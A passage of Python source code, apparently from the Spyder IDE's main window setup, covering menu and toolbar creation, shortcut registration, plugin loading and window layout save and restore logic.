self.register_shortcut(self.symbol_finder_action, context="_",
name="symbol finder", add_sc_to_tip=True)
self.file_toolbar_actions = [self.file_switcher_action,
self.symbol_finder_action]
def create_edit_action(text, tr_text, icon):
textseq = text.split(' ')
method_name = textseq[0].lower()+"".join(textseq[1:])
action = create_action(self, tr_text,
icon=icon,
triggered=self.global_callback,
data=method_name,
context=Qt.WidgetShortcut)
self.register_shortcut(action, "Editor", text)
return action
self.undo_action = create_edit_action('Undo', _('Undo'),
ima.icon('undo'))
self.redo_action = create_edit_action('Redo', _('Redo'),
ima.icon('redo'))
self.copy_action = create_edit_action('Copy', _('Copy'),
ima.icon('editcopy'))
self.cut_action = create_edit_action('Cut', _('Cut'),
ima.icon('editcut'))
self.paste_action = create_edit_action('Paste', _('Paste'),
ima.icon('editpaste'))
self.selectall_action = create_edit_action("Select All",
_("Select All"),
ima.icon('selectall'))
self.edit_menu_actions = [self.undo_action, self.redo_action,
None, self.cut_action, self.copy_action,
self.paste_action, self.selectall_action]
namespace = None
self.debug_print(" ..toolbars")
# File menu/toolbar
self.file_menu = self.menuBar().addMenu(_("&File"))
self.file_toolbar = self.create_toolbar(_("File toolbar"),
"file_toolbar")
# Edit menu/toolbar
self.edit_menu = self.menuBar().addMenu(_("&Edit"))
self.edit_toolbar = self.create_toolbar(_("Edit toolbar"),
"edit_toolbar")
# Search menu/toolbar
self.search_menu = self.menuBar().addMenu(_("&Search"))
self.search_toolbar = self.create_toolbar(_("Search toolbar"),
"search_toolbar")
# Source menu/toolbar
self.source_menu = self.menuBar().addMenu(_("Sour&ce"))
self.source_toolbar = self.create_toolbar(_("Source toolbar"),
"source_toolbar")
# Run menu/toolbar
self.run_menu = self.menuBar().addMenu(_("&Run"))
self.run_toolbar = self.create_toolbar(_("Run toolbar"),
"run_toolbar")
# Debug menu/toolbar
self.debug_menu = self.menuBar().addMenu(_("&Debug"))
self.debug_toolbar = self.create_toolbar(_("Debug toolbar"),
"debug_toolbar")
# Consoles menu/toolbar
self.consoles_menu = self.menuBar().addMenu(_("C&onsoles"))
# Projects menu
self.projects_menu = self.menuBar().addMenu(_("&Projects"))
self.projects_menu.aboutToShow.connect(self.valid_project)
# Tools menu
self.tools_menu = self.menuBar().addMenu(_("&Tools"))
# View menu
self.view_menu = self.menuBar().addMenu(_("&View"))
# Help menu
self.help_menu = self.menuBar().addMenu(_("&Help"))
# Status bar
status = self.statusBar()
status.setObjectName("StatusBar")
status.showMessage(_("Welcome to Spyder!"), 5000)
self.debug_print(" ..tools")
# Tools + External Tools
prefs_action = create_action(self, _("Pre&ferences"),
icon=ima.icon('configure'),
triggered=self.edit_preferences,
context=Qt.ApplicationShortcut)
self.register_shortcut(prefs_action, "_", "Preferences",
add_sc_to_tip=True)
spyder_path_action = create_action(self,
_("PYTHONPATH manager"),
None, icon=ima.icon('pythonpath'),
triggered=self.path_manager_callback,
tip=_("Python Path Manager"),
menurole=QAction.ApplicationSpecificRole)
update_modules_action = create_action(self,
_("Update module names list"),
triggered=lambda:
module_completion.reset(),
tip=_("Refresh list of module names "
"available in PYTHONPATH"))
reset_spyder_action = create_action(
self, _("Reset Spyder to factory defaults"),
triggered=self.reset_spyder)
self.tools_menu_actions = [prefs_action, spyder_path_action]
if WinUserEnvDialog is not None:
winenv_action = create_action(self,
_("Current user environment variables..."),
icon='win_env.png',
tip=_("Show and edit current user environment "
"variables in Windows registry "
"(i.e. for all sessions)"),
triggered=self.win_env)
self.tools_menu_actions.append(winenv_action)
self.tools_menu_actions += [reset_spyder_action, MENU_SEPARATOR,
update_modules_action]
# External Tools submenu
self.external_tools_menu = QMenu(_("External Tools"))
self.external_tools_menu_actions = []
# WinPython control panel
self.wp_action = create_action(self, _("WinPython control panel"),
icon=get_icon('winpython.svg'),
triggered=lambda:
programs.run_python_script('winpython', 'controlpanel'))
if os.name == 'nt' and is_module_installed('winpython'):
self.external_tools_menu_actions.append(self.wp_action)
# Qt-related tools
additact = []
for name in ("designer-qt4", "designer"):
qtdact = create_program_action(self, _("Qt Designer"),
name, 'qtdesigner.png')
if qtdact:
break
for name in ("linguist-qt4", "linguist"):
qtlact = create_program_action(self, _("Qt Linguist"),
"linguist", 'qtlinguist.png')
if qtlact:
break
args = ['-no-opengl'] if os.name == 'nt' else []
for act in (qtdact, qtlact):
if act:
additact.append(act)
if additact and is_module_installed('winpython'):
self.external_tools_menu_actions += [None] + additact
# Guidata and Sift
self.debug_print(" ..sift?")
gdgq_act = []
# Guidata and Guiqwt don't support PyQt5 yet and they fail
# with an AssertionError when imported using those bindings
# (see issue 2274)
try:
from guidata import configtools
from guidata import config # analysis:ignore
guidata_icon = configtools.get_icon('guidata.svg')
guidata_act = create_python_script_action(self,
_("guidata examples"), guidata_icon,
"guidata",
osp.join("tests", "__init__"))
gdgq_act += [guidata_act]
except:
pass
try:
from guidata import configtools
from guiqwt import config # analysis:ignore
guiqwt_icon = configtools.get_icon('guiqwt.svg')
guiqwt_act = create_python_script_action(self,
_("guiqwt examples"), guiqwt_icon, "guiqwt",
osp.join("tests", "__init__"))
if guiqwt_act:
gdgq_act += [guiqwt_act]
sift_icon = configtools.get_icon('sift.svg')
sift_act = create_python_script_action(self, _("Sift"),
sift_icon, "guiqwt", osp.join("tests", "sift"))
if sift_act:
gdgq_act += [sift_act]
except:
pass
if gdgq_act:
self.external_tools_menu_actions += [None] + gdgq_act
# ViTables
vitables_act = create_program_action(self, _("ViTables"),
"vitables", 'vitables.png')
if vitables_act:
self.external_tools_menu_actions += [None, vitables_act]
# Maximize current plugin
self.maximize_action = create_action(self, '',
triggered=self.maximize_dockwidget,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.maximize_action, "_", "Maximize pane")
self.__update_maximize_action()
# Fullscreen mode
self.fullscreen_action = create_action(self,
_("Fullscreen mode"),
triggered=self.toggle_fullscreen,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.fullscreen_action, "_",
"Fullscreen mode", add_sc_to_tip=True)
# Main toolbar
self.main_toolbar_actions = [self.maximize_action,
self.fullscreen_action,
None,
prefs_action, spyder_path_action]
self.main_toolbar = self.create_toolbar(_("Main toolbar"),
"main_toolbar")
# Internal console plugin
self.debug_print(" ..plugin: internal console")
from spyder.plugins.console import Console
self.console = Console(self, namespace, exitfunc=self.closing,
profile=self.profile,
multithreaded=self.multithreaded,
message=_("Spyder Internal Console\n\n"
"This console is used to report application\n"
"internal errors and to inspect Spyder\n"
"internals with the following commands:\n"
" spy.app, spy.window, dir(spy)\n\n"
"Please don't use it to run your code\n\n"))
self.console.register_plugin()
# Working directory plugin
self.debug_print(" ..plugin: working directory")
from spyder.plugins.workingdirectory import WorkingDirectory
self.workingdirectory = WorkingDirectory(self, self.init_workdir, main=self)
self.workingdirectory.register_plugin()
self.toolbarslist.append(self.workingdirectory)
# Help plugin
if CONF.get('help', 'enable'):
self.set_splash(_("Loading help..."))
from spyder.plugins.help import Help
self.help = Help(self)
self.help.register_plugin()
# Outline explorer widget
if CONF.get('outline_explorer', 'enable'):
self.set_splash(_("Loading outline explorer..."))
from spyder.plugins.outlineexplorer import OutlineExplorer
self.outlineexplorer = OutlineExplorer(self)
self.outlineexplorer.register_plugin()
# Editor plugin
self.set_splash(_("Loading editor..."))
from spyder.plugins.editor import Editor
self.editor = Editor(self)
self.editor.register_plugin()
# Populating file menu entries
quit_action = create_action(self, _("&Quit"),
icon=ima.icon('exit'),
tip=_("Quit"),
triggered=self.console.quit,
context=Qt.ApplicationShortcut)
self.register_shortcut(quit_action, "_", "Quit")
restart_action = create_action(self, _("&Restart"),
icon=ima.icon('restart'),
tip=_("Restart"),
triggered=self.restart,
context=Qt.ApplicationShortcut)
self.register_shortcut(restart_action, "_", "Restart")
self.file_menu_actions += [self.file_switcher_action,
self.symbol_finder_action, None,
restart_action, quit_action]
self.set_splash("")
self.debug_print(" ..widgets")
# Explorer
if CONF.get('explorer', 'enable'):
self.set_splash(_("Loading file explorer..."))
from spyder.plugins.explorer import Explorer
self.explorer = Explorer(self)
self.explorer.register_plugin()
# History log widget
if CONF.get('historylog', 'enable'):
self.set_splash(_("Loading history plugin..."))
from spyder.plugins.history import HistoryLog
self.historylog = HistoryLog(self)
self.historylog.register_plugin()
# Online help widget
try: # Qt >= v4.4
from spyder.plugins.onlinehelp import OnlineHelp
except ImportError: # Qt < v4.4
OnlineHelp = None # analysis:ignore
if CONF.get('onlinehelp', 'enable') and OnlineHelp is not None:
self.set_splash(_("Loading online help..."))
self.onlinehelp = OnlineHelp(self)
self.onlinehelp.register_plugin()
# Project explorer widget
self.set_splash(_("Loading project explorer..."))
from spyder.plugins.projects import Projects
self.projects = Projects(self)
self.projects.register_plugin()
self.project_path = self.projects.get_pythonpath(at_start=True)
# Find in files
if CONF.get('find_in_files', 'enable'):
from spyder.plugins.findinfiles import FindInFiles
self.findinfiles = FindInFiles(self)
self.findinfiles.register_plugin()
# Namespace browser
self.set_splash(_("Loading namespace browser..."))
from spyder.plugins.variableexplorer import VariableExplorer
self.variableexplorer = VariableExplorer(self)
self.variableexplorer.register_plugin()
# IPython console
self.set_splash(_("Loading IPython console..."))
from spyder.plugins.ipythonconsole import IPythonConsole
self.ipyconsole = IPythonConsole(self)
self.ipyconsole.register_plugin()
self.set_splash(_("Setting up main window..."))
# Help menu
trouble_action = create_action(self,
_("Troubleshooting..."),
triggered=self.trouble_guide)
dep_action = create_action(self, _("Dependencies..."),
triggered=self.show_dependencies,
icon=ima.icon('advanced'))
report_action = create_action(self,
_("Report issue..."),
icon=ima.icon('bug'),
triggered=self.report_issue)
support_action = create_action(self,
_("Spyder support..."),
triggered=self.google_group)
self.check_updates_action = create_action(self,
_("Check for updates..."),
triggered=self.check_updates)
# Spyder documentation
spyder_doc = 'https://docs.spyder-ide.org/'
doc_action = create_action(self, _("Spyder documentation"),
icon=ima.icon('DialogHelpButton'),
triggered=lambda:
programs.start_file(spyder_doc))
self.register_shortcut(doc_action, "_",
"spyder documentation")
if self.help is not None:
tut_action = create_action(self, _("Spyder tutorial"),
triggered=self.help.show_tutorial)
else:
tut_action = None
shortcuts_action = create_action(self, _("Shortcuts Summary"),
shortcut="Meta+F1",
triggered=self.show_shortcuts_dialog)
#----- Tours
self.tour = tour.AnimatedTour(self)
self.tours_menu = QMenu(_("Interactive tours"))
self.tour_menu_actions = []
# TODO: Only show intro tour for now. When we are close to finish
# 3.0, we will finish and show the other tour
self.tours_available = tour.get_tours(0)
for i, tour_available in enumerate(self.tours_available):
self.tours_available[i]['last'] = 0
tour_name = tour_available['name']
def trigger(i=i, self=self): # closure needed!
return lambda: self.show_tour(i)
temp_action = create_action(self, tour_name, tip="",
triggered=trigger())
self.tour_menu_actions += [temp_action]
self.tours_menu.addActions(self.tour_menu_actions)
self.help_menu_actions = [doc_action, tut_action, shortcuts_action,
self.tours_menu,
MENU_SEPARATOR, trouble_action,
report_action, dep_action,
self.check_updates_action, support_action,
MENU_SEPARATOR]
# Python documentation
if get_python_doc_path() is not None:
pydoc_act = create_action(self, _("Python documentation"),
triggered=lambda:
programs.start_file(get_python_doc_path()))
self.help_menu_actions.append(pydoc_act)
# IPython documentation
if self.help is not None:
ipython_menu = QMenu(_("IPython documentation"), self)
intro_action = create_action(self, _("Intro to IPython"),
triggered=self.ipyconsole.show_intro)
quickref_action = create_action(self, _("Quick reference"),
triggered=self.ipyconsole.show_quickref)
guiref_action = create_action(self, _("Console help"),
triggered=self.ipyconsole.show_guiref)
add_actions(ipython_menu, (intro_action, guiref_action,
quickref_action))
self.help_menu_actions.append(ipython_menu)
# Windows-only: documentation located in sys.prefix/Doc
ipm_actions = []
def add_ipm_action(text, path):
"""Add installed Python module doc action to help submenu"""
# QAction.triggered works differently for PySide and PyQt
path = file_uri(path)
if not API == 'pyside':
slot=lambda _checked, path=path: programs.start_file(path)
else:
slot=lambda path=path: programs.start_file(path)
action = create_action(self, text,
icon='%s.png' % osp.splitext(path)[1][1:],
triggered=slot)
ipm_actions.append(action)
sysdocpth = osp.join(sys.prefix, 'Doc')
if osp.isdir(sysdocpth): # exists on Windows, except frozen dist.
for docfn in os.listdir(sysdocpth):
pt = r'([a-zA-Z\_]*)(doc)?(-dev)?(-ref)?(-user)?.(chm|pdf)'
match = re.match(pt, docfn)
if match is not None:
pname = match.groups()[0]
if pname not in ('Python', ):
add_ipm_action(pname, osp.join(sysdocpth, docfn))
# Installed Python modules submenu (Windows only)
if ipm_actions:
pymods_menu = QMenu(_("Installed Python modules"), self)
add_actions(pymods_menu, ipm_actions)
self.help_menu_actions.append(pymods_menu)
# Online documentation
web_resources = QMenu(_("Online documentation"))
webres_actions = create_module_bookmark_actions(self,
self.BOOKMARKS)
webres_actions.insert(2, None)
webres_actions.insert(5, None)
webres_actions.insert(8, None)
add_actions(web_resources, webres_actions)
self.help_menu_actions.append(web_resources)
# Qt assistant link
if sys.platform.startswith('linux') and not PYQT5:
qta_exe = "assistant-qt4"
else:
qta_exe = "assistant"
qta_act = create_program_action(self, _("Qt documentation"),
qta_exe)
if qta_act:
self.help_menu_actions += [qta_act, None]
# About Spyder
about_action = create_action(self,
_("About %s...") % "Spyder",
icon=ima.icon('MessageBoxInformation'),
triggered=self.about)
self.help_menu_actions += [MENU_SEPARATOR, about_action]
# Status bar widgets
from spyder.widgets.status import MemoryStatus, CPUStatus
self.mem_status = MemoryStatus(self, status)
self.cpu_status = CPUStatus(self, status)
self.apply_statusbar_settings()
# Third-party plugins
for mod in get_spyderplugins_mods():
try:
plugin = mod.PLUGIN_CLASS(self)
try:
# Not all the plugins have the check_compatibility method
# i.e Breakpoints, Profiler, Pylint
check = plugin.check_compatibility()[0]
except AttributeError:
check = True
if check:
self.thirdparty_plugins.append(plugin)
plugin.register_plugin()
except Exception as error:
print("%s: %s" % (mod, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
#----- View
# View menu
self.plugins_menu = QMenu(_("Panes"), self)
self.toolbars_menu = QMenu(_("Toolbars"), self)
self.quick_layout_menu = QMenu(_("Window layouts"), self)
self.quick_layout_set_menu()
self.view_menu.addMenu(self.plugins_menu) # Panes
add_actions(self.view_menu, (self.lock_dockwidgets_action,
self.close_dockwidget_action,
self.maximize_action,
MENU_SEPARATOR))
self.show_toolbars_action = create_action(self,
_("Show toolbars"),
triggered=self.show_toolbars,
context=Qt.ApplicationShortcut)
self.register_shortcut(self.show_toolbars_action, "_",
"Show toolbars")
self.view_menu.addMenu(self.toolbars_menu)
self.view_menu.addAction(self.show_toolbars_action)
add_actions(self.view_menu, (MENU_SEPARATOR,
self.quick_layout_menu,
self.toggle_previous_layout_action,
self.toggle_next_layout_action,
MENU_SEPARATOR,
self.fullscreen_action))
if set_attached_console_visible is not None:
cmd_act = create_action(self,
_("Attached console window (debugging)"),
toggled=set_attached_console_visible)
cmd_act.setChecked(is_attached_console_visible())
add_actions(self.view_menu, (MENU_SEPARATOR, cmd_act))
# Adding external tools action to "Tools" menu
if self.external_tools_menu_actions:
external_tools_act = create_action(self, _("External Tools"))
external_tools_act.setMenu(self.external_tools_menu)
self.tools_menu_actions += [None, external_tools_act]
# Filling out menu/toolbar entries:
add_actions(self.file_menu, self.file_menu_actions)
add_actions(self.edit_menu, self.edit_menu_actions)
add_actions(self.search_menu, self.search_menu_actions)
add_actions(self.source_menu, self.source_menu_actions)
add_actions(self.run_menu, self.run_menu_actions)
add_actions(self.debug_menu, self.debug_menu_actions)
add_actions(self.consoles_menu, self.consoles_menu_actions)
add_actions(self.projects_menu, self.projects_menu_actions)
add_actions(self.tools_menu, self.tools_menu_actions)
add_actions(self.external_tools_menu,
self.external_tools_menu_actions)
add_actions(self.help_menu, self.help_menu_actions)
add_actions(self.main_toolbar, self.main_toolbar_actions)
add_actions(self.file_toolbar, self.file_toolbar_actions)
add_actions(self.edit_toolbar, self.edit_toolbar_actions)
add_actions(self.search_toolbar, self.search_toolbar_actions)
add_actions(self.source_toolbar, self.source_toolbar_actions)
add_actions(self.debug_toolbar, self.debug_toolbar_actions)
add_actions(self.run_toolbar, self.run_toolbar_actions)
# Apply all defined shortcuts (plugins + 3rd-party plugins)
self.apply_shortcuts()
# Emitting the signal notifying plugins that main window menu and
# toolbar actions are all defined:
self.all_actions_defined.emit()
# Window set-up
self.debug_print("Setting up window...")
self.setup_layout(default=False)
# Show and hide shortcuts in menus for Mac.
# This is a workaround because we can't disable shortcuts
# by setting context=Qt.WidgetShortcut there
if sys.platform == 'darwin':
for name in ['file', 'edit', 'search', 'source', 'run', 'debug',
'projects', 'tools', 'plugins']:
menu_object = getattr(self, name + '_menu')
menu_object.aboutToShow.connect(
lambda name=name: self.show_shortcuts(name))
menu_object.aboutToHide.connect(
lambda name=name: self.hide_shortcuts(name))
if self.splash is not None:
self.splash.hide()
# Enabling tear off for all menus except help menu
if CONF.get('main', 'tear_off_menus'):
for child in self.menuBar().children():
if isinstance(child, QMenu) and child != self.help_menu:
child.setTearOffEnabled(True)
# Menu about to show
for child in self.menuBar().children():
if isinstance(child, QMenu):
try:
child.aboutToShow.connect(self.update_edit_menu)
except TypeError:
pass
self.debug_print("*** End of MainWindow setup ***")
self.is_starting_up = False
def post_visible_setup(self):
"""Actions to be performed only after the main window's `show` method
was triggered"""
self.restore_scrollbar_position.emit()
# Remove our temporary dir
atexit.register(self.remove_tmpdir)
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow,
# then set them again as floating windows here.
for widget in self.floating_dockwidgets:
widget.setFloating(True)
# In MacOS X 10.7 our app is not displayed after initialized (I don't
# know why because this doesn't happen when started from the terminal),
# so we need to resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emmited by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status of dockidgets (panes)
self.lock_dockwidgets_action.setChecked(self.dockwidgets_locked)
self.apply_panes_settings()
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole.isvisible:
self.historylog.add_history(get_conf_path('history.py'))
if self.open_project:
self.projects.open_project(self.open_project)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates(startup=True)
# Show dialog with missing dependencies
self.report_missing_dependencies()
self.is_setting_up = False
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if DEBUG:
title += u" [DEBUG MODE %d]" % DEBUG
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
missing_deps = dependencies.missing_dependencies()
if missing_deps:
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See issue 3748
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState()
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name, in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
for plugin in self.widgetlist:
try:
plugin.initialize_plugin_in_mainwindow_layout()
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time"""
self.set_window_settings(*settings)
self.setUpdatesEnabled(False)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# layouts are organized by columns, each colum is organized by rows
# widths have to add 1.0, height per column have to add 1.0
# Spyder Default Initial Layout
s_layout = {'widgets': [
# column 0
[[explorer_project]],
# column 1
[[editor]],
# column 2
[[outline]],
# column 3
[[help_plugin, explorer_variable, helper, explorer_file,
finder] + plugins,
[console_int, console_ipy, history]]
],
'width fraction': [0.0, # column 0 width
0.55, # column 1 width
0.0, # column 2 width
0.45], # column 3 width
'height fraction': [[1.0], # column 0, row heights
[1.0], # column 1, row heights
[1.0], # column 2, row heights
[0.46, 0.54]], # column 3, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
r_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_int]],
# column 1
[[explorer_variable, history, outline, finder] + plugins,
[explorer_file, explorer_project, help_plugin, helper]]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Matlab
m_layout = {'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [0.20, # column 0 width
0.40, # column 1 width
0.40], # column 2 width
'height fraction': [[0.55, 0.45], # column 0, row heights
[0.55, 0.45], # column 1, row heights
[0.55, 0.45]], # column 2, row heights
'hidden widgets': [],
'hidden toolbars': [],
}
# Vertically split
v_layout = {'widgets': [
# column 0
[[editor],
[console_ipy, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [1.0], # column 0 width
'height fraction': [[0.55, 0.45]], # column 0, row heights
'hidden widgets': [outline],
'hidden toolbars': [],
}
# Horizontally split
h_layout = {'widgets': [
# column 0
[[editor]],
# column 1
[[console_ipy, console_int, explorer_file,
explorer_project, help_plugin, explorer_variable,
history, outline, finder, helper] + plugins]
],
'width fraction': [0.55, # column 0 width
0.45], # column 1 width
'height fraction': [[1.0], # column 0, row heights
[1.0]], # column 1, row heights
'hidden widgets': [outline],
'hidden toolbars': []
}
# Layout selection
layouts = {'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout}
layout = layouts[index]
widgets_layout = layout['widgets']
widgets = []
for column in widgets_layout :
for row in column:
for widget in row:
if widget is not None:
widgets.append(widget)
# Make every widget visible
for widget in widgets:
widget.toggle_view(True)
action = widget.toggle_view_action
try:
action.setChecked(widget.dockwidget.isVisible())
except:
pass
# Set the widgets horizontally
for i in range(len(widgets) - 1):
first, second = widgets[i], widgets[i+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
Qt.Horizontal)
# Arrange rows vertically
for column in widgets_layout :
for i in range(len(column) - 1):
first_row, second_row = column[i], column[i+1]
if first_row is not None and second_row is not None:
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout :
for row in column:
for i in range(len(row) - 1):
first, second = row[i], row[i+1]
if first is not None and second is not None:
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = global_hidden_widgets + layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
# set the width and height
self._layout_widget_info = []
width, height = self.window_size.width(), self.window_size.height()
# fix column width
# for c in range(len(widgets_layout)):
# widget = widgets_layout[c][0][0].dockwidget
# min_width, max_width = widget.minimumWidth(), widget.maximumWidth()
# info = {'widget': widget,
# 'min width': min_width,
# 'max width': max_width}
# self._layout_widget_info.append(info)
# new_width = int(layout['width fraction'][c] * width * 0.95)
# widget.setMinimumWidth(new_width)
# widget.setMaximumWidth(new_width)
